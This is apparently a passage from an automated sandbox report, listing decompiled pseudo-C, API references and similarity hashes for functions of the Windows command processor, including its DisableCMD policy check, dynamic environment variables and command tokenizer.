                                                    0x011f67d1
                                                    0x011f67a8
                                                    0x011f67a8
                                                    0x00000000
                                                    0x011f67a8
                                                    0x011f67a6
                                                    0x011f67a6
                                                    0x00000000
                                                    0x011f67a6
                                                    0x011f6762
                                                    0x011f6767
                                                    0x011f676f
                                                    0x011f67b1
                                                    0x011f67b1
                                                    0x011f67b1
                                                    0x011f67b6
                                                    0x00000000
                                                    0x011f67b6
                                                    0x011f6771
                                                    0x011f6771
                                                    0x011f6784
                                                    0x011f6788
                                                    0x011f678b
                                                    0x011f678f
                                                    0x011f6795
                                                    0x011f6799
                                                    0x00000000
                                                    0x011f6799
                                                    0x011f6af3
                                                    0x011f6af5
                                                    0x00000000
                                                    0x011f6af5
                                                    0x011f6663
                                                    0x011f6668
                                                    0x011f666a
                                                    0x011f66b4
                                                    0x011f66b4
                                                    0x011f66ba
                                                    0x011f66bd
                                                    0x011f66c1
                                                    0x011f66c2
                                                    0x011f66c2
                                                    0x00000000
                                                    0x011f66bd
                                                    0x011f666c
                                                    0x011f6673
                                                    0x011f6675
                                                    0x011f6677
                                                    0x011f6677
                                                    0x011f668c
                                                    0x011f6692
                                                    0x011f6694
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6696
                                                    0x011f669d
                                                    0x011f669f
                                                    0x011f66a1
                                                    0x011f66a1
                                                    0x011f66a6
                                                    0x011f66ad
                                                    0x011f66af
                                                    0x011f66b2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f6640
                                                    0x011f6642
                                                    0x011f6643
                                                    0x011f6643
                                                    0x011f6afa
                                                    0x011f6b01
                                                    0x011f6b11
                                                    0x011f6b12
                                                    0x011f6b13
                                                    0x011f6b1e
                                                    0x011f6b1e

                                                    APIs
                                                    • memset.MSVCRT ref: 011F6613
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 011F668C
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F6B01
                                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                                    • _get_osfhandle.MSVCRT ref: 011F66E9
                                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F66F1
                                                    • _get_osfhandle.MSVCRT ref: 011F6701
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6709
                                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                                    • _get_osfhandle.MSVCRT ref: 011F6739
                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F6741
                                                    • memmove.MSVCRT ref: 011F678F
                                                    • _get_osfhandle.MSVCRT ref: 011F6812
                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F681A
                                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 011F6882
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 011F692B
                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011F6932
                                                    • _get_osfhandle.MSVCRT ref: 011F697E
                                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6986
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 011F6A1E
                                                    • _get_osfhandle.MSVCRT ref: 011F6A76
                                                    • SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6A7E
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6AAD
                                                      • Part of subcall function 011F9953: _get_osfhandle.MSVCRT ref: 011F9956
                                                      • Part of subcall function 011F9953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F995E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
                                                    • String ID: DPATH
                                                    • API String ID: 1247154890-2010427443
                                                    • Opcode ID: 1d0f6e0e6f47bf7cf1a632663d13191709d094bbcbd0298914dc1264654f4730
                                                    • Instruction ID: 13f2b848f647374717876c164d168e2c41af6bb4fe1aa5d519398cf27b700200
                                                    • Opcode Fuzzy Hash: 1d0f6e0e6f47bf7cf1a632663d13191709d094bbcbd0298914dc1264654f4730
                                                    • Instruction Fuzzy Hash: F8F1B271608342DFDB28DF29D848B6BBBE4FB98714F044A2DF68597284EB70D844CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E44FC, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E011E44FC() {
				signed int _v8;
				char _v24;
				int* _v28;
				char _v29;
				char _v36;
				void* _v40;
				int* _v44;
				int _v48;
				int _v52;
				signed int _t26;
				void* _t39;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t51;
				int _t53;
				intOrPtr _t55;
				int _t59;
				int _t64;
				void* _t73;
				void* _t75;
				intOrPtr _t82;
				void* _t84;
				void* _t95;
				char* _t96;
				signed int _t97;
				signed int _t98;

				_t26 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t26 ^ _t98;
				_v44 = 0;
				 *0x120b938 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				E011E465D(_t75);
				__imp__HeapSetInformation(0, 1, 0, 0, _t95, _t97, _t73);
				_v36 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_v40) == 0) {
					_v48 = 4;
					RegQueryValueExW(_v40, L"DisableCMD", 0,  &_v52,  &_v36,  &_v48);
					RegCloseKey(_v40);
				}
				 *0x11fd614 = 1;
				_t93 = 0x11fd600;
				 *0x11fd610 =  &_v29;
				_t39 = E011E4719(0x11fd600);
				asm("sbb al, al");
				 *0x11fd614 =  *0x11fd614 &  ~(_t39 - 1);
				E011E46D8();
				_v28 = 0;
				_t96 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t44 = E011E3D27(0,  &_v24);
				if(_v36 == 1) {
					_push(0);
					_push(0x40002729);
					E011DC108( &_v24);
					E011F3BB0(__eflags, 0);
					do {
						__eflags = E011E4B60(__eflags, 0);
					} while (__eflags == 0);
					_push(0xff);
					goto L13;
				} else {
					_t96 = 0xff;
					if(_t44 == 0) {
						L29:
						_push(0);
						L011E82C1();
						_v28 = _t44;
						_t84 = 0x120b8b8;
						_t97 = 2;
						__eflags = _t44;
						if(_t44 == 0) {
							L33:
							__eflags = _v36 - _t97;
							if(_v36 != _t97) {
								_t55 = E011E0178(_t44);
								__eflags = _t55;
								if(_t55 == 0) {
									_t97 = 3;
									__imp___setmode(0x8000);
									0 = 0;
								}
								E011DB2B0(0, 0);
								while(1) {
									L40:
									 *0x11fd590 = 0;
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E011DEEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										continue;
									}
									L41:
									__eflags = _t96 - 0xffffffff;
									if(__eflags == 0) {
										do {
											__eflags = E011E4B60(__eflags, 0);
										} while (__eflags == 0);
										L25:
										_push(0);
										L13:
										exit();
										L14:
										_t48 = E011DEEF0(1, _t93,  *0x1213cd8);
										if(_t48 == 1) {
											do {
												__eflags = E011E4B60(__eflags, 0);
											} while (__eflags == 0);
											_push(1);
											goto L13;
										}
										if(_t48 == 0xffffffff) {
											do {
												__eflags = E011E4B60(__eflags, 0);
											} while (__eflags == 0);
											goto L25;
										}
										_t93 = _t48;
										_t51 = E011E0E00(0, _t48);
										if(_t51 != 0) {
											_v28 = _t51;
										}
										L8:
										_t97 = _t97 + 1;
										if(_t97 < 3) {
											L7:
											_t93 =  *((intOrPtr*)(_t98 + _t97 * 4 - 0x14));
											if( *((intOrPtr*)(_t98 + _t97 * 4 - 0x14)) != 0) {
												goto L14;
											}
											goto L8;
										}
										E011E06C0(0);
										_t53 = GetConsoleOutputCP();
										 *0x1203854 = _t53;
										GetCPInfo(_t53, 0x1203840);
										_t44 = E011E465D(0);
										_t82 =  *0x1213ccc;
										L10:
										_t106 = _t82;
										if(_t82 == 0) {
											 *0x1218058 = 0;
											goto L29;
										} else {
											goto L11;
										}
										do {
											L11:
										} while (E011E4B60(_t106, 0) == 0);
										_push(_v28);
										goto L13;
									}
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
									_t59 = GetConsoleOutputCP();
									 *0x1203854 = _t59;
									GetCPInfo(_t59, 0x1203840);
									E011E465D(_t86);
									E011E0E00(0, _t96);
									 *0x11fd59c = 0;
									E011E06C0(0);
									_t64 = GetConsoleOutputCP();
									 *0x1203854 = _t64;
									GetCPInfo(_t64, 0x1203840);
									E011E465D(0);
									do {
										goto L40;
									} while (_t96 == 1);
									goto L41;
									L40:
									 *0x11fd590 = 0;
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E011DEEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
								}
							}
							_push(0);
							_push(0x40002729);
							E011DC108(_t84);
							E011F3BB0(__eflags, 0);
							do {
								__eflags = E011E4B60(__eflags, 0);
							} while (__eflags == 0);
							_push(_t96);
							goto L13;
						}
						__eflags = _t44 - _t97;
						if(__eflags != 0) {
							goto L33;
						} else {
							goto L31;
						}
						do {
							L31:
							__eflags = E011E4B60(__eflags, 0);
						} while (__eflags == 0);
						goto L25;
					}
					_push(0);
					_push(0x120b8b8);
					L011E82C1();
					_t82 =  *0x1213ccc;
					if(_t44 != 0) {
						_t44 = 1;
						_v44 = 1;
						__eflags = _t82;
						if(__eflags != 0) {
							_v28 = 0xff;
						}
					} else {
						_t44 = _v44;
					}
					if(_t44 != 0) {
						goto L10;
					} else {
						_t97 = 0;
						goto L7;
					}
				}
			}





























                                                    0x011e4504
                                                    0x011e450b
                                                    0x011e4513
                                                    0x011e4529
                                                    0x011e452e
                                                    0x011e4538
                                                    0x011e4541
                                                    0x011e455d
                                                    0x011ee6ee
                                                    0x011ee707
                                                    0x011ee710
                                                    0x011ee710
                                                    0x011e4566
                                                    0x011e456d
                                                    0x011e4572
                                                    0x011e4577
                                                    0x011e457f
                                                    0x011e4581
                                                    0x011e4587
                                                    0x011e458e
                                                    0x011e4591
                                                    0x011e4594
                                                    0x011e4598
                                                    0x011e4599
                                                    0x011e459a
                                                    0x011e459b
                                                    0x011e45a4
                                                    0x011ee71b
                                                    0x011ee71c
                                                    0x011ee721
                                                    0x011ee729
                                                    0x011ee72e
                                                    0x011ee734
                                                    0x011ee734
                                                    0x011ee738
                                                    0x00000000
                                                    0x011e45aa
                                                    0x011e45aa
                                                    0x011e45b1
                                                    0x011ee77f
                                                    0x011ee77f
                                                    0x011ee785
                                                    0x011ee78a
                                                    0x011ee78e
                                                    0x011ee791
                                                    0x011ee792
                                                    0x011ee794
                                                    0x011ee7a6
                                                    0x011ee7a6
                                                    0x011ee7a9
                                                    0x011ee7d0
                                                    0x011ee7d5
                                                    0x011ee7d7
                                                    0x011ee7db
                                                    0x011ee7e2
                                                    0x011ee7e9
                                                    0x011ee7e9
                                                    0x011ee7eb
                                                    0x011ee7f0
                                                    0x011ee7f0
                                                    0x011ee7f6
                                                    0x011ee7fc
                                                    0x011ee808
                                                    0x011ee80e
                                                    0x011ee815
                                                    0x011ee817
                                                    0x011ee81e
                                                    0x011ee820
                                                    0x011ee823
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee825
                                                    0x011ee825
                                                    0x011ee828
                                                    0x011ee899
                                                    0x011ee89f
                                                    0x011ee89f
                                                    0x011ee762
                                                    0x011ee762
                                                    0x011e4625
                                                    0x011e4625
                                                    0x011e462b
                                                    0x011e4634
                                                    0x011e463c
                                                    0x011ee768
                                                    0x011ee76e
                                                    0x011ee76e
                                                    0x011ee772
                                                    0x00000000
                                                    0x011ee772
                                                    0x011e4645
                                                    0x011ee758
                                                    0x011ee75e
                                                    0x011ee75e
                                                    0x00000000
                                                    0x011ee758
                                                    0x011e464b
                                                    0x011e464f
                                                    0x011e4656
                                                    0x011e4658
                                                    0x011e4658
                                                    0x011e45e3
                                                    0x011e45e3
                                                    0x011e45e7
                                                    0x011e45db
                                                    0x011e45db
                                                    0x011e45e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e45e1
                                                    0x011e45e9
                                                    0x011e45ee
                                                    0x011e45fa
                                                    0x011e45ff
                                                    0x011e4605
                                                    0x011e460a
                                                    0x011e4610
                                                    0x011e4610
                                                    0x011e4612
                                                    0x011ee779
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e4618
                                                    0x011e4618
                                                    0x011e461e
                                                    0x011e4622
                                                    0x00000000
                                                    0x011e4622
                                                    0x011ee830
                                                    0x011ee83c
                                                    0x011ee842
                                                    0x011ee848
                                                    0x011ee854
                                                    0x011ee859
                                                    0x011ee85f
                                                    0x011ee868
                                                    0x011ee86d
                                                    0x011ee873
                                                    0x011ee878
                                                    0x011ee884
                                                    0x011ee889
                                                    0x011ee88f
                                                    0x011ee7f0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee7f0
                                                    0x011ee7f6
                                                    0x011ee7fc
                                                    0x011ee808
                                                    0x011ee80e
                                                    0x011ee815
                                                    0x011ee817
                                                    0x011ee81e
                                                    0x011ee820
                                                    0x011ee820
                                                    0x011ee7f0
                                                    0x011ee7ab
                                                    0x011ee7ac
                                                    0x011ee7b1
                                                    0x011ee7b9
                                                    0x011ee7be
                                                    0x011ee7c4
                                                    0x011ee7c4
                                                    0x011ee7c8
                                                    0x00000000
                                                    0x011ee7c8
                                                    0x011ee796
                                                    0x011ee798
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ee79a
                                                    0x011ee79a
                                                    0x011ee7a0
                                                    0x011ee7a0
                                                    0x00000000
                                                    0x011ee7a4
                                                    0x011e45b7
                                                    0x011e45b8
                                                    0x011e45bd
                                                    0x011e45c4
                                                    0x011e45cc
                                                    0x011ee744
                                                    0x011ee745
                                                    0x011ee748
                                                    0x011ee74a
                                                    0x011ee750
                                                    0x011ee750
                                                    0x011e45d2
                                                    0x011e45d2
                                                    0x011e45d2
                                                    0x011e45d7
                                                    0x00000000
                                                    0x011e45d9
                                                    0x011e45d9
                                                    0x00000000
                                                    0x011e45d9
                                                    0x011e45d7

                                                    APIs
                                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E4516
                                                    • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 011E4523
                                                      • Part of subcall function 011E465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                                      • Part of subcall function 011E465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                                    • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 011E4538
                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 011E4555
                                                    • _setjmp3.MSVCRT ref: 011E45BD
                                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 011E45EE
                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E45FF
                                                    • exit.MSVCRT ref: 011E4625
                                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 011EE707
                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011EE710
                                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E4770
                                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E478C
                                                      • Part of subcall function 011E46D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                                      • Part of subcall function 011E46D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                                      • Part of subcall function 011E46D8: memset.MSVCRT ref: 011E4703
                                                      • Part of subcall function 011E3D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                                      • Part of subcall function 011E3D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                                      • Part of subcall function 011E3D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                                      • Part of subcall function 011E3D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D85
                                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D99
                                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                                    • _setjmp3.MSVCRT ref: 011EE785
                                                    Strings
                                                    • Software\Policies\Microsoft\Windows\System, xrefs: 011E454B
                                                    • DisableCMD, xrefs: 011EE6FF
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
                                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                    • API String ID: 4268540630-1920437939
                                                    • Opcode ID: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                                    • Instruction ID: 11d40929f194e6a4fe30daf578201b1c5c5b5d6784bd68168e57703f76d61b55
                                                    • Opcode Fuzzy Hash: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                                    • Instruction Fuzzy Hash: C171D571E41A0AEEEF3DEBF5BC9CA7E3BE9EB18218B140429E501D2185DF70C4408B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DCFBC, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                                    • _wcsicmp.MSVCRT ref: 011DD005
                                                    • _wcsicmp.MSVCRT ref: 011DD01B
                                                    • _wcsicmp.MSVCRT ref: 011DD031
                                                    • _wcsicmp.MSVCRT ref: 011DD047
                                                    • _wcsicmp.MSVCRT ref: 011DD05D
                                                    • _wcsicmp.MSVCRT ref: 011DD073
                                                    • _wcsicmp.MSVCRT ref: 011DD085
                                                    • _wcsicmp.MSVCRT ref: 011DD09B
                                                      • Part of subcall function 011D96A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                                      • Part of subcall function 011D96A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                                      • Part of subcall function 011D96A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                                      • Part of subcall function 011D96A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                    • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                    • API String ID: 2447294730-2301591722
                                                    • Opcode ID: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                                    • Instruction ID: 5a0ed5444746943e53c27e84cdc6754e49d4beb7520d823db971327570d2ce85
                                                    • Opcode Fuzzy Hash: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                                    • Instruction Fuzzy Hash: 1F311832608602ABFF3CA77ABC1DFAB26DDDB95564B14441EF512D11C4EF319002C766
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DF300, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 441COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 96%
                                                    			E011DF300(signed int __eax, signed short* __ecx, intOrPtr __edx, signed int _a4) {
				signed short* _v8;
				intOrPtr _v12;
				signed short* _v16;
				long _v20;
				signed int _t92;
				signed int _t102;
				signed int _t109;
				signed char _t110;
				int _t111;
				wchar_t* _t112;
				wchar_t* _t113;
				int _t114;
				signed int _t120;
				long _t121;
				int _t122;
				wchar_t* _t123;
				signed int _t129;
				int _t130;
				signed int _t135;
				int _t136;
				signed int _t139;
				signed short* _t141;
				int _t148;
				long _t152;
				int _t153;
				int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				int _t164;
				wchar_t* _t165;
				wchar_t* _t166;
				signed short* _t167;
				signed int _t169;
				signed int _t173;
				long* _t174;
				long* _t180;
				long* _t181;
				intOrPtr _t182;
				long* _t183;
				long _t184;
				long _t185;
				long _t186;
				long _t187;
				void* _t188;
				void* _t189;
				void* _t192;

				_t175 = __ecx;
				_t92 = __eax;
				_push(0);
				_push(0x120b8f8);
				_v12 = __edx;
				_v8 = __ecx;
				L011E82C1();
				_t189 = _t188 + 8;
				if(__eax != 0) {
					L139:
					return _t92 | 0xffffffff;
				}
				_t180 = _v8;
				if(_t180 == 0) {
					if( *0x120f984 != 0) {
						_push( *0x120b8a0);
						E011E25D9(L"Ungetting: \'%s\'\n");
					}
					 *0x120b8a4 =  *0x120b8a0;
					return 0;
				} else {
					if(_v12 < 6) {
						goto L139;
					}
					_t169 = _a4;
					 *0x120b8a0 =  *0x120b8a4;
					_v16 = _t180;
					if((_t169 & 0x00000021) == 0) {
						while(1) {
							_t187 = E011DF9D5(_t175) & 0x0000ffff;
							_t164 = iswspace(_t187);
							_t189 = _t189 + 4;
							if(_t164 != 0 && _t187 != 0xa) {
								goto L6;
							} else {
								continue;
							}
							do {
								_t187 = E011DF9D5(_t175) & 0x0000ffff;
								_t164 = iswspace(_t187);
								_t189 = _t189 + 4;
							} while (_t164 != 0 && _t187 != 0xa);
							L6:
							if((_t169 & 0x00000004) != 0) {
								_t165 = 0x11d2102;
							} else {
								_t165 = L"=,;";
							}
							_t166 = wcschr(_t165, _t187);
							_t189 = _t189 + 8;
							if(_t166 != 0) {
								if(_t187 == 0) {
									goto L9;
								} else {
									continue;
								}
							}
							L9:
							_t167 =  *0x120b8a4;
							if(_t167 != 0x1203890) {
								 *0x120b8a4 = _t167 - 2;
							}
							goto L11;
						}
					}
					L11:
					_t184 = E011DF9D5(_t175) & 0x0000ffff;
					if( *0x11fd5b4 != 0) {
						 *0x11fd5b4 = 0;
						if((_t169 & 0x00000040) != 0) {
							goto L41;
						} else {
							_t184 = E011DF9D5(_t175) & 0x0000ffff;
							goto L12;
						}
						goto L140;
					} else {
						L12:
						_t129 = _t184 & 0x0000ffff;
						if(_t129 != 0xa) {
							if(_t129 >= 0x41) {
								if(_t129 >= 0x7c) {
									goto L25;
								} else {
									goto L33;
								}
							} else {
								L25:
								if(_t129 > 0x7c) {
									goto L33;
								} else {
									_t16 = _t129 + 0x11df8c0; // 0x5050500
									switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M011DF8A8))) {
										case 0:
											goto L13;
										case 1:
											goto L14;
										case 2:
											L27:
											if((_t169 & 0x0000002a) == 8) {
												goto L28;
											}
											goto L33;
										case 3:
											L28:
											if((_t169 & 0x00000022) == 0) {
												if((_t169 & 0x00000010) != 0 || _t184 != 0x29) {
													goto L13;
												} else {
												}
											}
											goto L33;
										case 4:
											if((__bl & 0x00000022) != 0) {
												goto L33;
											} else {
												if( *0x11fd548 != 0) {
													goto L27;
												} else {
													goto L41;
												}
											}
											goto L140;
										case 5:
											goto L33;
									}
								}
							}
						} else {
							L13:
							_t169 = _t169 & 0xffffffdd;
							_a4 = _t169;
							L14:
							if((_t169 & 0x00000022) == 0) {
								L15:
								 *_t180 = _t184;
								_t183 =  &(_t180[0]);
								_v8 = _t183;
								_t174 = _t183;
								_t136 = iswdigit(_t184);
								_t192 = _t189 + 4;
								if(_t136 != 0) {
									_t184 = E011DF9D5(_t175) & 0x0000ffff;
									_t174 =  &(_t183[0]);
									 *_t183 = _t184;
									_t183 = _t174;
									_v8 = _t183;
								}
								if(_t184 == 0x3e || _t184 == 0x26 || _t184 == 0x7c || _t184 == 0x3c) {
									_t139 = E011DF9D5(_t175) & 0x0000ffff;
									if(_t139 ==  *(_t183 - 2)) {
										 *_t183 = _t139;
										_t183 =  &(_t174[0]);
										_v8 = _t183;
										_t139 = E011DF9D5(_t175) & 0x0000ffff;
										_t174 = _t183;
									}
									_t176 =  *(_t183 - 2) & 0x0000ffff;
									if(_t176 != 0x3e) {
										if(_t176 != 0x3c) {
											goto L79;
										}
										goto L78;
									} else {
										L78:
										if(_t139 == 0x26) {
											 *_t183 = 0x26;
											_t183 =  &(_t174[0]);
											_v8 = _t183;
											goto L109;
											do {
												do {
													L109:
													_t186 = E011DF9D5(_t176) & 0x0000ffff;
													_t148 = iswspace(_t186);
													_t192 = _t192 + 4;
												} while (_t148 != 0);
												_t176 = L"=,;";
											} while (E011DD7D4(L"=,;", _t186) != 0);
											if(iswdigit(_t186) != 0) {
												 *_t183 = _t186;
												_t183 =  &(_t183[0]);
												_v8 = _t183;
												E011DF9D5(_t176);
											}
										}
										L79:
										_t141 =  *0x120b8a4;
										if(_t141 != 0x1203890) {
											 *0x120b8a4 = _t141 - 2;
										}
										goto L20;
									}
								} else {
									L20:
									 *_t183 = 0;
									return  *_v16 & 0x0000ffff;
								}
							}
							L33:
							if(_t184 == 0x5e) {
								if((_t169 & 0x00000022) != 0) {
									goto L34;
								} else {
